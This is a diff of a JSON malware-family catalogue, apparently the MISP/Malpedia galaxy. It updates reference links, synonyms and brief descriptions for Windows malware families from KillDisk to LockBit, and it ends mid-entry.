"https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat", + "https://www.forcepoint.com/de/blog/x-labs/trojanized-adobe-installer-used-install-dragonok-s-new-custom-backdoor", "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/", - "https://blogs.forcepoint.com/security-labs/trojanized-adobe-installer-used-install-dragonok%E2%80%99s-new-custom-backdoor" + "https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/" ], "synonyms": [], "type": [] @@ -10349,6 +19235,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk", + "https://www.secureworks.com/research/threat-profiles/iron-viking", + "https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/", "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/" ], @@ -10358,13 +19246,46 @@ "uuid": "e81f3e3f-966c-4c99-8d4b-fc0a1d3bb027", "value": "KillDisk" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kimjongrat", + "https://www.reuters.com/article/us-usa-election-cyber-louisiana-exclusiv/exclusive-national-guard-called-in-to-thwart-cyberattack-in-louisiana-weeks-before-election-idUSKBN27823F" + ], + "synonyms": [], + "type": [] + }, + "uuid": "61edd17b-322d-45dc-a6a0-31c13ec2338e", + "value": "KimJongRat" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kimsuky", + "https://blog.prevailion.com/2019/09/autumn-aperture-report.html", + "https://metaswan.github.io/posts/Malware-Kimsuky-group's-resume-impersonation-malware", + "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/", + "https://www.boho.or.kr/filedownload.do?attach_file_seq=2652&attach_file_id=EpF2652.pdf", + "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure", + "https://blog.alyac.co.kr/2347", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html", + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Kim.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "860643d6-5693-4e4e-ad1f-56c49faa10a7", + "value": "Kimsuky" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kins", "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", - "https://www.youtube.com/watch?v=C-dEOt0GzSE", "https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/", "https://www.vkremez.com/2018/10/lets-learn-exploring-zeusvm-banking.html", "https://github.com/nyx0/KINS" @@ -10378,14 +19299,44 @@ "uuid": "07f6bbff-a09a-4580-96ea-62795a8dae11", "value": "KINS" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kivars", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt", + "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/", + "https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6c585194-96d3-463d-ac21-aa942439cc26", + "value": "KIVARS" + }, + { + "description": "Microsoft describes that threat actor ZINC is using Klackring as a malware dropped by ComeBacker, both being used to target security researchers.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.klackring", + "https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "03a4eb90-8d88-49c7-a973-2201115ea5a8", + "value": "Klackring" + }, { "description": "KleptoParasite Stealer is advertised on Hackforums as a noob-friendly stealer. It is modular and comes with a IP retriever module, a Outlook stealer (32bit/64bit) and a Chrome/Firefox stealer (32bit/64bit). Earlier versions come bundled (loader plus modules), newer versions come with a loader (167k) that grabs the modules.\r\n\r\nPDB-strings suggest a relationship to JogLog v6 and v7.", "meta": { "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer", "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer" ], "synonyms": [ - "Joglog" + "Joglog", + "Parasite" ], "type": [] }, @@ -10406,13 +19357,34 @@ "uuid": "70459959-5a20-482e-b714-2733f5ff310e", "value": "KLRD" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.knot", + "https://twitter.com/malwrhunterteam/status/1345313324825780226" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0479b7cd-982e-430e-a96e-338aec8ae3cf", + "value": "Knot Ransomware" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic", + "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", + "https://blog.tofile.dev/2020/11/28/koadic_jarm.html", + "http://www.secureworks.com/research/threat-profiles/cobalt-ulster", + "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf", + "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", - "https://github.com/zerosum0x0/koadic" + "https://www.secureworks.com/research/threat-profiles/gold-drake", + "https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf", + "https://github.com/zerosum0x0/koadic", + "https://www.secureworks.com/research/threat-profiles/cobalt-ulster" ], "synonyms": [], "type": [] @@ -10443,21 +19415,27 @@ "https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2015-120808-5327-99", "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx" ], - "synonyms": [], + "synonyms": [ + "Splinter RAT" + ], "type": [] }, "uuid": "116f4c5f-fd51-4e90-995b-f16c46523c06", "value": "KOMPROGO" }, { - "description": "", + "description": "Konni is a remote administration tool, observed in the wild since early 2014. The Konni malware family is potentially linked to APT37, a North-Korean cyber espionage group active since 2012. The group primary victims are South-Korean political organizations, as well as Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.konni", "http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html", + "https://blog.alyac.co.kr/2474", + "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html", + "https://us-cert.cisa.gov/ncas/alerts/aa20-227a", "https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant", - "https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/", - "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html" + "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b", + "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/", + "https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/" ], "synonyms": [], "type": [] @@ -10482,11 +19460,22 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia", + "https://unit42.paloaltonetworks.com/unit42-bisonal-malware-used-attacks-russia-south-korea/", + "https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/", + "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.93_ENG.pdf", "https://securitykitten.github.io/2014/11/25/curious-korlia.html", - "https://camal.coseinc.com/publish/2013Bisonal.pdf", - "https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/", + "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf", "http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit", - "https://www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf" + "https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html", + "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/", + "https://asec.ahnlab.com/1298", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_3_takai_jp.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-huntley", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", + "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf", + "https://web.archive.org/web/20130920120931/https:/www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/", + "https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment" ], "synonyms": [ "Bisonal" @@ -10501,10 +19490,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kovter", - "https://github.com/ewhitehats/kovterTools/blob/master/KovterWhitepaper.pdf", + "https://www.symantec.com/connect/blogs/kovter-malware-learns-poweliks-persistent-fileless-registry-update", "https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/", "https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/kovter-an-evolving-malware-gone-fileless" + "https://github.com/ewhitehats/kovterTools/blob/master/KovterWhitepaper.pdf", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/kovter-an-evolving-malware-gone-fileless", + "https://0x00sec.org/t/analyzing-modern-malware-techniques-part-1/18663", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/" ], "synonyms": [], "type": [] @@ -10517,9 +19511,22 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer", - "https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/" + "https://blog.ensilo.com/game-of-trojans-dissecting-khalesi-infostealer-malware", + "https://isc.sans.edu/diary/26010", + "https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/", + "https://isc.sans.edu/diary/25934", + "https://news.drweb.com/show/?i=13242&lng=en", + "https://www.proofpoint.com/us/threat-insight/post/new-kpot-v20-stealer-brings-zero-persistence-and-memory-features-silently-steal", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://blag.nullteilerfrei.de/2020/04/26/use-ghidra-to-decrypt-strings-of-kpotstealer-malware/", + "https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/", + "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/kpot2/KPOT.md" + ], + "synonyms": [ + "Khalesi", + "Kpot" ], - "synonyms": [], "type": [] }, "uuid": "b1fe4226-1783-48d4-b1d2-417703a03b3d", @@ -10548,7 +19555,6 @@ "https://www.peppermalware.com/2019/03/analysis-of-blackmoon-banking-trojans.html", "http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/", "https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan", - "http://training.nshc.net/ENG/Document/virus/20140305_Internet_Bank_Pharming_-_BlackMoon_Ver_1.0_External_ENG.pdf", "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/" ], "synonyms": [ @@ -10563,8 +19569,7 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.krdownloader", - "https://www.fidelissecurity.com/threatgeek/2017/05/blackmoon-rising-banking-trojan-back-new-framework" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.krdownloader" ], "synonyms": [], "type": [] @@ -10577,17 +19582,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos", + "https://www.zdnet.com/article/security-researcher-malwaretech-pleads-guilty/", + "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf", "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack", "https://www.proofpoint.com/us/threat-insight/post/kronos-reborn", - "https://www.zdnet.com/article/security-researcher-malwaretech-pleads-guilty/", + "https://blog.morphisec.com/long-live-osiris-banking-trojan-targets-german-ip-addresses", "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", - "https://www.lexsi.com/securityhub/overview-kronos-banking-malware-rootkit/?lang=en", + "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/", "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/", - "https://www.lexsi.com/securityhub/kronos-decrypting-the-configuration-file-and-injects/?lang=en", - "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/", - "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos", - "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/", + "https://dissectingmalwa.re/osiris-the-god-of-afterlifeand-banking-malware.html", "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware", + "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/", + "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/", + "https://twitter.com/3xp0rtblog/status/1294157781415743488", "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/" ], "synonyms": [ @@ -10598,11 +19605,26 @@ "uuid": "62a7c823-9af0-44ee-ac05-8765806d2a17", "value": "Kronos" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kryptocibule", + "https://www.welivesecurity.com/2020/09/02/kryptocibule-multitasking-multicurrency-cryptostealer/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8039c56c-3be1-4344-81cf-6c21b06bbaa6", + "value": "KryptoCibule" + }, { "description": "A keylogger used by Turla.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ksl0t", + "https://0ffset.net/reverse-engineering/malware-analysis/analyzing-turlas-keylogger-1/", + "https://0ffset.net/reverse-engineering/malware-analysis/analyzing-turlas-keylogger-2/", "https://0ffset.wordpress.com/2018/10/05/post-0x17-2-turla-keylogger/" ], "synonyms": [], @@ -10670,8 +19692,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs", - "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia", - "https://www.securityartwork.es/2019/03/13/orangeworm-group-kwampirs-analysis-update/" + "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf", + "https://blog.reversinglabs.com/blog/unpacking-kwampirs-rat", + "https://www.zdnet.com/article/fbi-re-sends-alert-about-supply-chain-attacks-for-the-third-time-in-three-months/", + "https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/", + "https://www.securityartwork.es/2019/03/13/orangeworm-group-kwampirs-analysis-update/", + "http://www.documentcloud.org/documents/6821581-FLASH-CP-000111-MW-Downgraded-Version.html", + "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia" ], "synonyms": [], "type": [] @@ -10683,15 +19710,35 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert", - "http://adelmas.com/blog/longhorn.php", - "https://www.youtube.com/watch?v=jeLd-gw2bWo", - "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7", - "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lalala_stealer", + "https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html", + "https://securitynews.sonicwall.com/xmlpost/lalala-infostealer-which-comes-with-batch-and-powershell-scripting-combo/", + "https://twitter.com/luc4m/status/1276477397102145538", + "https://www.hornetsecurity.com/en/security-information/information-stealer-campaign-targeting-german-hr-contacts/" ], "synonyms": [], "type": [] }, + "uuid": "62f1846f-3026-4824-b739-8f9ae5e9c8bb", + "value": "LALALA Stealer" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert", + "https://www.youtube.com/watch?v=jeLd-gw2bWo", + "https://ti.qianxin.com/blog/articles/network-weapons-of-cia/", + "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7", + "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7ca2e331-2209-46a8-9e60-4cb83f9602de&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + ], + "synonyms": [ + "Plexor" + ], + "type": [] + }, "uuid": "3af9397a-b4f7-467d-93af-b3d77dcfc38d", "value": "Lambert" }, @@ -10729,17 +19776,14 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarus", - "https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/", - "https://twitter.com/PhysicalDrive0/status/828915536268492800", - "http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html", - "https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.laturo", + "https://seclists.org/snort/2019/q3/343" ], "synonyms": [], "type": [] }, - "uuid": "eead20f5-6a30-4700-8d14-cfb2d42eaff0", - "value": "Lazarus (Windows)" + "uuid": "e1958a69-49c3-43a2-ba80-6e5cd5bbcd13", + "value": "Laturo Stealer" }, { "description": "", @@ -10760,6 +19804,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazycat", + "https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/", "https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/" ], "synonyms": [], @@ -10768,6 +19813,32 @@ "uuid": "454db469-724a-4084-873c-906abf91d0d5", "value": "LazyCat" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lcpdot", + "https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "23dd327e-5d1d-4b75-993e-5d79d9fc0a70", + "value": "LCPDot" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.leakthemall", + "https://id-ransomware.blogspot.com/2020/09/leakthemall-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "526add8e-ed78-4e8e-8d4c-152570fe566e", + "value": "Leakthemall Ransomware" + }, { "description": "", "meta": { @@ -10786,7 +19857,6 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.leouncia", - "https://www.rsaconference.com/writable/presentations/file_upload/crwd-t11-hide_and_seek-how_threat_actors_respond_in_the_face_of_public_exposure.pdf", "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor-part-2.html", "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor.html" ], @@ -10805,7 +19875,6 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic", "http://www.malware-traffic-analysis.net/2017/11/02/index.html", "http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html", - "https://www.arbornetworks.com/blog/asert/lethic-spambot-analysis-pills-watches-and-diplomas/", "http://resources.infosecinstitute.com/win32lethic-botnet-analysis/" ], "synonyms": [], @@ -10814,14 +19883,107 @@ "uuid": "342f5c56-861c-4a06-b5db-85c3c424f51f", "value": "Lethic" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.liderc", + "https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ed825d46-be1e-4d36-b828-1b85274773dd", + "value": "Liderc" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightneuron", + "https://www.secureworks.com/research/threat-profiles/iron-hunter", + "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/", + "https://securelist.com/apt-trends-report-q2-2018/86487/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments", + "https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf", + "https://www.welivesecurity.com/2019/05/07/turla-lightneuron-email-too-far/" + ], + "synonyms": [ + "NETTRANS", + "XTRANS" + ], + "type": [] + }, + "uuid": "96b0b8fa-79b6-4519-a794-f6f325f96fd7", + "value": "LightNeuron" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ligsterac", + "https://securelist.com/atm-infector/74772/", + "http://atm.cybercrime-tracker.net/index.php" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7d328c7b-7dc8-4891-bbd1-a05dedc8bac4", + "value": "Ligsterac" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lilith", + "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-endtrade-finding-multi-stage-backdoors-that-tick/", + "https://github.com/werkamsus/Lilith" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c443dc36-f439-46d8-8ce7-07d3532a412b", + "value": "Lilith" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.limedownloader", + "https://github.com/NYAN-x-CAT/Lime-Downloader" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a70436b1-559d-48af-836f-f46074cd8ef3", + "value": "limedownloader" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.limeminer", + "https://github.com/NYAN-x-CAT/Lime-Miner" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3819bc21-8c15-48ee-8e68-ee2a0c5f82a7", + "value": "limeminer" + }, { "description": " ## Description\r\n Simple yet powerful RAT for Windows machines. This project is simple and easy to understand, It should give you a general knowledge about dotNET malwares and how it behaves. \r\n \r\n ---\r\n\r\n## Main Features\r\n\r\n- **.NET**\r\n - Coded in Visual Basic .NET, Client required framework 2.0 or 4.0 dependency, And server is 4.0\r\n- **Connection**\r\n - Using pastebin.com as ip:port , Instead of noip.com DNS. And Also using multi-ports\r\n- **Plugin**\r\n - Using plugin system to decrease stub's size and lower the AV detection\r\n- **Encryption**\r\n - The communication between server & client is encrypted with AES\r\n- **Spreading**\r\n - Infecting all files and folders on USB drivers\r\n- **Bypass**\r\n - Low AV detection and undetected startup method\r\n- **Lightweight**\r\n - Payload size is about 25 KB\r\n- **Anti Virtual Machines**\r\n - Uninstall itself if the machine is virtual to avoid scanning or analyzing \r\n- **Ransomware**\r\n - Encrypting files on all HHD and USB with .Lime extension\r\n- **XMR Miner**\r\n - High performance Monero CPU miner with user idle\\active optimizations\r\n- **DDoS**\r\n - Creating a powerful DDOS attack to make an online service unavailable\r\n- **Crypto Stealer**\r\n - Stealing Cryptocurrency sensitive data\r\n- **Screen-Locker**\r\n - Prevents user from accessing their Windows GUI \r\n - **And more**\r\n - On Connect Auto Task\r\n\t- Force enable Windows RDP\r\n\t- Persistence\r\n - File manager\r\n - Passowrds stealer\r\n - Remote desktop\r\n - Bitcoin grabber\r\n - Downloader\r\n - Keylogger", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.limerat", "https://www.youtube.com/watch?v=x-g-ZLeX8GM", + "https://github.com/NYAN-x-CAT/Lime-RAT/", + "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns", "https://blog.yoroi.company/research/limerat-spreads-in-the-wild/", - "https://github.com/NYAN-x-CAT/Lime-RAT/" + "https://blog.reversinglabs.com/blog/rats-in-the-library", + "https://lab52.io/blog/apt-c-36-recent-activity-analysis/" ], "synonyms": [], "type": [] @@ -10841,12 +20003,26 @@ "uuid": "dcd1f76d-5a40-4c58-b01e-a749871fe50b", "value": "Limitail" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.linseningsvr", + "https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9a66df8d-ce65-49d6-a648-c1a5ea58cbc2", + "value": "LinseningSvr" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.listrix", - "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks" ], "synonyms": [], "type": [] @@ -10854,12 +20030,27 @@ "uuid": "54c8a055-a4be-4ec0-9943-ecad929e0dac", "value": "Listrix" }, + { + "description": "According to CarbonBlack, LiteDuke is a third stage backdoor. It appears to use the same dropper as PolyglotDuke. Its payload makes use of an AES encrypted SQLite database to store its configuration. LiteDuke supports a large number of individual commands including host information retrieval, file upload and download, and the ability to execute other code. LiteDuke C2 servers appear to be compromised servers, and the malware communicates with them using normal HTTP requests. It attempts to use a realistic User-Agent string to blend in better with normal HTTP traffic. \r\nESET have dubbed it LiteDuke because it uses SQLite to store information such as its configuration.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.liteduke", + "https://norfolkinfosec.com/looking-back-at-liteduke/", + "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ae7352bd-86e9-455d-bdc3-0567886a8392", + "value": "LiteDuke" + }, { "description": "According to AlienVault, LiteHTTP bot is a new HTTP bot programmed in C#. The bot has the ability to collect system information, download and execute programs, and update and kill other bots present on the system. \r\n\r\nThe source is on GitHub: https://github.com/zettabithf/LiteHTTP", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.litehttp", "https://github.com/zettabithf/LiteHTTP", + "https://viriback.com/recent-litehttp-activities-and-iocs/", "https://malware.news/t/recent-litehttp-activities-and-iocs/21053" ], "synonyms": [], @@ -10870,16 +20061,54 @@ }, { "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit", + "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Lockbit.md", + "https://www.zdnet.com/article/ransomware-hits-helicopter-maker-kopter/", + "https://www.crypsisgroup.com/insights/ransomwares-new-trend-exfiltration-and-extortion", + "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://news.sophos.com/en-us/2020/04/24/lockbit-ransomware-borrows-tricks-to-keep-up-with-revil-and-maze/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://id-ransomware.blogspot.com/search?q=lockbit", + "https://blog.lexfo.fr/lockbit-malware.html", + "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/481/original/010421_LockBit_Interview.pdf", + "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1", + "https://news.sophos.com/en-us/2020/10/21/lockbit-attackers-uses-automated-attack-tools-to-identify-tasty-targets", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/" + ], + "synonyms": [ + "ABCD Ransomware" + ], + "type": [] + }, + "uuid": "fd035735-1ab9-419d-a94c-d560612e970b", + "value": "LockBit" + }, + { + "description": "According to Trend Micro, LockerGoga is a ransomware that has been used in multiple attacks, most notably against Altran Technologies and Norsk Hydro. It encrypts a range of documents and source code files but certain versions had little to no whitelist that would protect import system files such 